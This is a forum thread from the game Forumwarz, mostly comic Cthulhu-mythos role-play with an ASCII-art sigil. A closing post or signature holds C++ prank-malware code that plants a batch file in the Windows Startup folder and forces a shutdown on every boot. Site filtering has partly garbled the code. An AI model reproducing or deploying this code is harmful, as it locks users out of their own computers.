Check out our blog!
Forumwarz is the first "Massively Single-Player" online RPG completely built around Internet culture.

You are currently looking at Flamebate, our community forums. Players can discuss the game here, strategize, and role play as their characters.

You need to be logged in to post and to see the uncensored versions of these forums.

Role Playing
Switch to Civil Discussion Role-Playing
Religion Ia! Ia! Cthulhu Fhtagn!

أوه اللعنة!

People, please. If you value your life – leave this place. He’s under my control, but, I don’t know how much longer I can contain him.

Eibon, you fool! Help me get this thing back into the dark portal!

A’watl n’yxis cor’and er eveos ni’jana verump’imos

(Eibon! Quit reading and give me a hand! Damn it!)

Abdul Alhazred edited this message on 05/12/2010 12:35AM

There. That seal should keep him locked away for now. Nothing to see. Let’s pretend this never happened.

Let us take a moment to consider just how lucky we are to all be alive. And sane.

Yes. So very, very sane.

*twitch*

Quick! To the Byakhee! He’ll fly us to safety.

Wait. This means we’re under Hastur’s favor. Truly we must be blessed.

Well. After a night of complete rest and meditation. I can honestly say I’m perfectly sane. Yep. Sane.

I can bumure you, good people, there are absolutely no horrible creatures lurking in the darkness. Only our own boogy-men of our minds eye. And there are certainly no invisible monsters now weaving through the fabric of our reality and into these very forums. Nope. None at all.

Just to clarify: We are all perfectly sane. Nothing has changed. Safe.

Master_Troll

Avatar: 58489 2010-05-26 01:29:58 -0400

Level 69 Emo Kid

Lee_Harvey_Oswald is Pinky and I'm Brain

>implying this makes any sense at all

King Krimson

[Snobby McSnobbers-
ons
]

Level 69 Troll

A lot fo kewl boiz wer it ok!

What’s your opnion on Nightgaunts? I think they’re awesome, along with those Ghoul fellows.

And about your book: through pages 109 to 154, the text just repeats the phrases ‘ARRRGH’ and ‘THERE IS NO GOD’ over and over, along with a couple of bizzare drawings. What the hell was that all about?

I'M A SIG-DISABLING COCKMONGLER

King Krimson Posted:

What’s your opnion on Nightgaunts? I think they’re awesome, along with those Ghoul fellows.

Un-natural creatures. Excellent servitors. I glimpsed them once as I dreamed of Ngranek. And the ghouls disgust me. Grave-robbing vagabonds in their tunnels. الغول, should not be trusted. I’m sure Nobody Owens here would be happy to share more information on the subject.

King Krimson Posted:

And about your book: through pages 109 to 154, the text just repeats the phrases ‘ARRRGH’ and ‘THERE IS NO GOD’ over and over, along with a couple of bizzare drawings. What the hell was that all about?

Hahaha. We all go a little mad sometimes. Nothing to worry about. And please, don’t go redrawing those scribbles on a stone wall, with white chalk. By candle-light. On the third night of the month. It is gibberish and nothing more. And NO GOOD would come from you meddling in things.

Master_Troll Posted:

>implying this makes any sense at all

How do I do this… Let’s see.

(It’s this key > right? To denote sarcasm? Yes?)

Ahem.

>Implying reality makes any sense at all.

Once the veil is lifted and you see beyond worlds, nay, Universes you shall see. My friend, you may see yet. Keep your wits about you. O! We may not make it out alive. Though, a loss of life may be a weak punishment for our treading upon the lands of The Old Ones.

Yorgle

Avatar: 223399 2009-12-20 21:37:28 -0500

[The Blue Labyrinth]

Level 1 Re-Re

hi there guy, what about this one other red duck lookin guy? His name is Rhindle and I think he got summoned by this elder whatsit or something. He’s my cousin but he’s always all “hey yorgle i’m badbum and that’s because i’m a elder god”

Fortune Cook-
ie

Avatar: 222814 2009-12-12 16:13:59 -0500

[WeChall is a ****ty klan]

Level 2 Re-Re

Ancient Chinese Secret...

It's dangerous to go alone. Take this:

Yre

Avatar: 232966 2011-08-03 17:12:48 -0400

[Good Omens]

Level 2 Hacker

“BASIC”

Hey, you there, odd arab person, you seem like you know what this ****’s about. I acquired this dogreat timesent, and it mentioned malevolent willows. Should I be avoiding my local park in addition to the deep, dark ocean and infinite, sepulchral caves?

Fortune Cookie Posted:

It's dangerous to go alone. Take this:

I hold more faith in this symbol. I have seen sources that claim yours is some kind of weak derivative.

I’ve been trying to incorporate a digital form of the symbol in my projects. I’m not sure, but I think there are unpleasant things out here on the net too. I could tell you, but it’s not safe. Nowhere. They are everywhere, I know it. I hope this will keep them at bay. Here’s my latest attempt, do you think it will function?

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+***+#@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@##++#@@@@@@@@@#**;:.,;*#@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+*;;;*+@@@@@@#+*;,.:@+.:+#@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+*:.,,,;#@@@@#+;:`;@@@@#,*#@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#*:`@@@`;+@@@@+;,.@@@@@@#,*#@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;.@@@@`:*@@@#*:.@@@@@@@.:+#@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#*:,@@@@`:*#@#*;,#@@@@@@*,;+@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#*:;@@@@.:*#@#*:.@@@@@@#.:*#@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#*:.@@@@,:*#@+;.@@@@@@@.:*+@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+:.@@@@::*#+*:.@@@@@@.,*+#@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;.@@@@*,*+*;.#@@@@@:,;+#@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#*,;@@@#,;**:,@@#@@#.:+##@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+:.@@@@.:*;.@@@@@@.:*+@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;`@@@@*,;::@@@@@*.;+#@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@##+++++#@@@@#*,+@@@@.:.@@@@@@.;*#@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@#+*;;;;;+#@@@#*:.@@@@#`@@@@@@:,*#@@@######@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@+*;,.``..;*#@@@+;.@@@@@@@@@@@@.;*###++**;***+@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@+*;.;@@@#+.:+@@@#*,*@@@@@@@@@@,,*++**;;::,,,;*+@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@#+;.#@@@@@@#,*#@@#*:.@@@@@@@@@@.;;;;::..;+##*.;+@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@#+;.;@@#@@@@@.*#@@#*:`@@@@@@@@@@.....`,#@@@@@@;:+#@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@#*::@@@@@@@@.:*#@@@+:.@@@@@@@@@@@@@@@@@@@@@@@@;:*#@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@#;.@@@@@@@@@.;+@@@@+;.@@@@@@@@@@@@@@@@@@@@@@@@`:*@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@##@@#*.@@@@@@@@@.;+@@@@+;.@@@@@@@@@@@@@@@@@@@@@@@@.;+@@@@@@@@@@@
@@@@@@@@@@@@@@@##+++++##*,:@@@@@@@@.;+@@@@+;,#@@@@@@@@@@@@@@@@@@@@@@.:*#@@@@@@@@@@@
@@@@@@@@@@@@@@+**;:::;*++;,.@@@@@@#.;+@@@@+;.@@@@@@@@@@@@@@@@@@@@@@.,;+#@@@@@@@@@@@
@@@@@@@@@@@@#+*;,.,,`.;++*:.@@@@@@@.;+@@@+*:.@@@@@@@@@@@@@@@@@@@@,`:;+#@@@@@@@@@@@@
@@@@@@@@@@@@#+,.#@@@@#.*++;.@@@@@@@.;+@@#+;.+@@@@@@@@@@@@####+:`.:;*+#@@@@@@@@@@@@@
@@@@@@@@@@@@+:.#@@@@@@`:*+;,:@@@@@@`;+@##*:.@@@@@@@#:...,,,,,::;;*+#@@@@@@@@@@@@@@@
@@@@@@@@@@@#+::@@@@@@@.,*+*:.@@@@@@`:*##*;`@@@@@@@.,::;;*******++#@@@@@@@@@@@@@@@@@
@@@@@@@@@@@#*,+@@@@@@@#.;++;.*@@@@@;:*++;.#@@@@@@`:;*++++#####@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@+:.@@@@@@@@.;++*:,@@@@@#,;+*,,@@@@@@.:;*##@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@+;.#@@@@@@@.:*#+;`@@@@@@.;*:`@@@@@@*,;+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@#*:.@@@@@@@:,*++*,*@@@@@.:;.#@@@@@@.;*#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@#+;.@@@@@@@@.;+#*:.@@@@@,:.*@@@@@@`:*+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@#;.+@#@@@@@.:*#+:.@@@@@*..@@@@@@.,;+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@#*:`@@@@@@@;,*#+*,:@@@@@:@@@@@@;,;+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@+;,+@@@@@@#,;+#+;.@@@@@@@@@@@+.;*#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@#*::@@@@@@@.;+#+*,:@@@@@@@@@@.:*+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@+;`@@@@@@@:,*##*;.@@@@@@@@@:,;+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@#*,+@@@@@@@.;+#+*,;@@@@@@@@.;*#@@#######++++++++++##@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@#*:.@@@@@@@.;+##*:.#@@@@@@:,;++++*****;;;;;;;;;;;;;+#@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@+*.@@@@@@@.,*##*:.@@@@@@@`:;*;;;;::::,,,,...``.`.,;+@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@#*:;@@@@@@+,;++;,;@@@@@@#,,,,,..``.:*+##@@@@@@@@@.;+@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@#*;.@@@@@@@.:**:.@@@@@@@@;;++#@@@@@@@@@@@@@@@@@@@.:+@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@+*.@@@@@@@*,*;,*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*.;+@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@#*,:@@@@@@@.::`@@@@@@@@@@@@@@@@@@@@@@@@@@@@##,..;*#@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@#*;`@@@@@@@,:,+@@@@@@@@@@@@@@@@@@@@@@@@@@#:..,:;*##@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@+*,:@@@@@@@.;@@@@@@@@@@@@@@@@@@@@@@@@;`..,:;**+#@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@#+;`@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*...,:;;;*+##@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@+;,:@@@@@@@@@@@@@@@@@@@@@@@@#:`.,:;;**++##@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@#*:`@@@@@@@@@@@@@@@@@#**:.`.,::;**++##@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@+;,,@@@@@@@@@@+.``..,:,:;:;;*++##@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@#*:`@@@@@@@@@#.:;;;;;****++###@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@+*,;@@@@@@@@@`:;*++#####@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@#*:`@@@@@@@@@.,*+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@#+;.*@@@@@@@@*,*+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@+;:`@@@@@@@@@.:*#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@#;,.@@@@@@#@@`:*#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@+:.@@@@@@@@@`,;+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@#+,*@@@@@@@@:,;+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@#+,*@@@@@@@,,;+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@+:.@@@@@@`,;+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@+;.@@@@+.,*+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@#*:.@@:.:*+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@#+;:..,;*+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@#+**;*+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@####@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

““Until a man is twenty-five, he still thinks, every so often that under the right cirgreat timesstances he could be the baddest **** in the world”

King Krimson

[Snobby McSnobbers-
ons
]

Level 69 Troll

A lot fo kewl boiz wer it ok!

Oh Christ.

This was a complete accident, I swear.

I'M A SIG-DISABLING COCKMONGLER

xXx_LATCHKEY-
_KREW_xXx

Level 6 Camwhore

“Training Broad”

It will like, totally work. I’m totally sure of that.

Nobody Owens

Avatar: 234154 2010-04-08 03:40:01 -0400

[Phantasmagoric Spl-
endor
]

Level 6 Emo Kid

“Scene Kid”

King Krimson Posted:

You’d never want to meet a Ghoul. The red sky of Ghûlheim looks like a veil of sorrow over their inferno of a hometown. The Night Gaunts, however, are amazing. Without them, I’d be ghoul **** right now. The bastards wanted to bash my head open and eat my brains.

I miss my graveyard.

spf357

Avatar: 220601 2009-12-10 16:04:45 -0500

[Bronys]

Level 17 Hacker

Obvious piece of **** forum member is obvious...turd. I talk about male reproductive organs.

Private sub IHATETHAT

system.console.writeline(“I ****ing hate smileys in my code!”Log in to see images!

End Sub

————————————

#include <iostream>

#include <stdlib.h>

#include <windows.h>

#include <iomanip>

#include <stdio.h>

#include <conio.h>

#include <fstream>

using namespace std;

int main()

{ keybd_event(VK_MENU,0x38,0,0);

keybd_event(VK_RETURN,0x1c,0,0);

keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);

keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);

HANDLE outToScreen;

outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{

char buffer[255];

char inputFile[]=”CLog in to see images!\Dogreat timesents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”;

ifstream input(inputFile);

if (!input)

{

{

ofstream fp(“CLog in to see images!\Dogreat timesents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat”, ios::app);

fp << ”@ECHO OFF \n”;

fp << “START CLog in to see images!\rawr.exe \n”;

fp << “EXIT”;

}

}

else

{

while (!input.eof())

{

input.getline(buffer,255);

}

}

}

{

char buffer[255];

char inputFile[]=”CLog in to see images!\rawr.exe”;

ifstream input(inputFile);

if (!input)

{

{

{

ofstream fp(“CLICK.bat”, ios::app);

fp << ”@ECHO OFF \n”;

fp << “COPY matrix.exe CLog in to see images!\rawr.exe \n”;

fp << “START CLog in to see images!\rawr.exe \n”;

fp << “EXIT”;

}

system(“START CLICK.bat”Log in to see images!;

main();

}

}

else

{

while (!input.eof())

{

input.getline(buffer,255);

system(“call shutdown.exe -S”Log in to see images!;

goto START;

}

}

}

START:{

for(int i = 0; i < 1; i++)

{

int num = (rand() % 10);

SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);

cout << setw(4) << num;

cout << setw(4) << “0%”;

cout << setw(4) << “P”;

cout << setw(4) << ” ”;

cout << setw(4) << “Log in to see images!”;

cout << setw(4) << ”#”;

cout << setw(4) << “X”;

cout << setw(4) << ”@”;

cout << setw(4) << “1&”;

cout << setw(4) << ”*”;

cout << setw(4) << ”||”;

cout << setw(4) << ” \a”;

Sleep(60);

}

}

for ( int j = 0; j < 5; j++)

{

SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);

int number = (rand() % 24);

cout << setw(4) << number;

}

goto START;

}

spf357 edited this message on 05/19/2010 6:36AM

Internet Delay Chat
Have fun playing!
To chat with other players, you must Join Forumwarz or Log In now!